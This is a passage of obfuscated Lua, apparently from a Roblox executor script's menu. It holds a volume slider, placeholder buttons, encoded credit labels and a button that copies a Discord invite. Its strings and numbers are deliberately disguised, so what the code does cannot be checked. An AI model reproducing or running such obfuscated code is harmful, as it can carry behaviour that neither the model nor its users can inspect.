+ 0 ,736 -(450 + 286) ,3 -2 ,0);v64.Parent=v54;local v70=Instance.new(v7("\134\33\143\66\178\12\161\85\189\28","\211\104\200\48"),v64);v70.Color=ColorSequence.new(Color3.fromRGB(114 + 21 ,180 + 20 ,322 -(36 + 86) ));v70.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,0 + 0 ),NumberSequenceKeypoint.new(0.9999 -0 ,0 -0 ),NumberSequenceKeypoint.new(1 + 0 ,3 -2 )});local v73=Instance.new(v7("\73\250\221\206\221\104\235\209\213\241","\29\159\165\186\159"),v48);v73.ZIndex=19 -9 ;v73.BackgroundTransparency=857 -(149 + 707) ;v73.Size=UDim2.new(1325 -(654 + 670) ,826 -(120 + 706) ,1 -0 ,0 + 0 );v73.Font=Enum.Font.SourceSans;v73.TextColor3=Color3.fromRGB(1084 -(473 + 356) ,1400 -(186 + 959) ,144 + 111 );v73.TextSize=4 + 22 ;local v81=UserSettings():GetService(v7("\106\109\130\38\51\249\76\90\77\130\32\0\241\79\88\109","\63\30\231\84\116\152\33"));local v82=42 -(15 + 22) ;local v83=v81.MasterVolume;_G[v7("\225\60\235\52\224\41","\148\76\143\85")]=function(v84)local v93=v82/(73 + 27) ;local v94=math.round(v84/v93 ) * v93 ;v70.Offset=Vector2.new(v94-(4 -3) ,0 + 0 );v81.MasterVolume=v94;v73.Text=math.round(v94 * 100 )   .. "%" ;local v98=v81.MasterVolume-v83 ;if (v98~=(988 -(13 + 975))) then v45:Play();end v83=v81.MasterVolume;end;_G[v7("\163\11\31\71\22\133\180\11\25","\208\110\107\52\122\236")]=function()local v99=v54.AbsolutePosition.X;local v100=v54.AbsoluteSize.X;local v101=v38.X;local v102=math.clamp((v101-v99)/v100 ,0 -0 ,1 + 0 );update(v102);end;update(v81.MasterVolume);local v85=false;v73.MouseButton1Down:Connect(function()setslider();v85=true;end);v39.InputEnded:Connect(function(v86,v87)if (v86.UserInputType==Enum.UserInputType.MouseButton1) then v85=false;end end);v45.Volume=514 -(423 + 90) ;v38.Move:Connect(function()if v85 then setslider();end end);v48.Parent=v47;end});v21:AddButton({[v7("\252\55\172\133","\178\86\193\224\72\186\216\126")]="",[v7("\91\244\113\206\228\121\246\118","\24\149\29\162\134")]=function()print(v7("\218\30\170\83\131\45\254\200\25\187\84\159\38\186","\184\107\222\39\236\67\222"));end});v21:AddButton({[v7("\61\160\232\233","\115\193\133\140\221\228\57\118")]="",[v7("\127\115\206\136\94\115\193\143","\60\18\162\228")]=function()print(v7("\132\252\45\31\50\61\198\249\43\14\46\32\131\237","\230\137\89\107\93\83"));end});local v21=v13:MakeTab({[v7("\225\141\61\191","\175\236\80\218\16\129\158")]=v7("\226\171\134\59\228\226\221\3\137\227","\161\217\227\95\141\150\174\35"),[v7("\129\48\68\121","\200\83\43\23\127")]="rbxassetid://4483345998",[v7("\15\60\125\51\193\230\94\16\32\116\39","\95\78\24\94\168\147\51")]=false});local v22=v21:AddSection({[v7("\48\6\205\60","\126\103\160\89")]=v7("\82\96\34\87\162\27\222\43","\17\18\71\51\203\111\173")});v21:AddLabel(v7("\62\220\203\185\20\218\221\253\41\193\142\137\18\222\199\182\94\154\158\237\76\142\232\178\15\142\253\190\15\199\222\169","\125\174\174\221"));v21:AddLabel(v7("\26\220\79\184\235\0\165\121\250\69\252\214\27\166\48\197\9\232\178\68\231\121\232\69\174\162\33\159","\89\174\42\220\130\116\214"));v21:AddLabel(v7("\239\204\93\193\204\219\215\223\83\132\181\231\215\141\119\214\137\168\235\195\22\240\132\237\130\233\95\215\143\231\208\201","\162\173\54\164\236\136"));v21:AddLabel("https://discord.gg/mfAjWaz2j9");v21:AddButton({[v7("\131\180\161\178","\205\213\204\215")]=v7("\135\90\193\239\107\160\92\194\245\36\182\81\145\255\37\178\92\197\243","\196\53\177\150\75"),[v7("\155\216\46\88\204\218\135\48","\216\185\66\52\174\187\228\91")]=function()local v90=0 + 0 ;local v91;while true do if (v90==(0 -0)) then v91=346 -(203 + 143) ;while true do if (v91==(99 -(42 + 57))) then setclipboard("https://discord.gg/mfAjWaz2j9");v10:MakeNotification({[v7("\198\6\120\48","\136\103\21\85\97\111\224\176")]=v7("\234\48\66\225\231\205\126","\169\95\50\136\130"),[v7("\53\185\65\27\121\92\203","\118\214\47\111\28\50\191")]=v7("\107\228\227\11\188\55\105\122\254\177\54\163\51\32\83\207\228\0","\56\135\145\98\204\67\73"),[v7("\107\175\75\242\220","\34\194\42\149\185\218\135")]="rbxassetid://4483345998",[v7("\232\207\57\14","\188\166\84\107\133")]=3 + 2 });break;end end break;end end end});
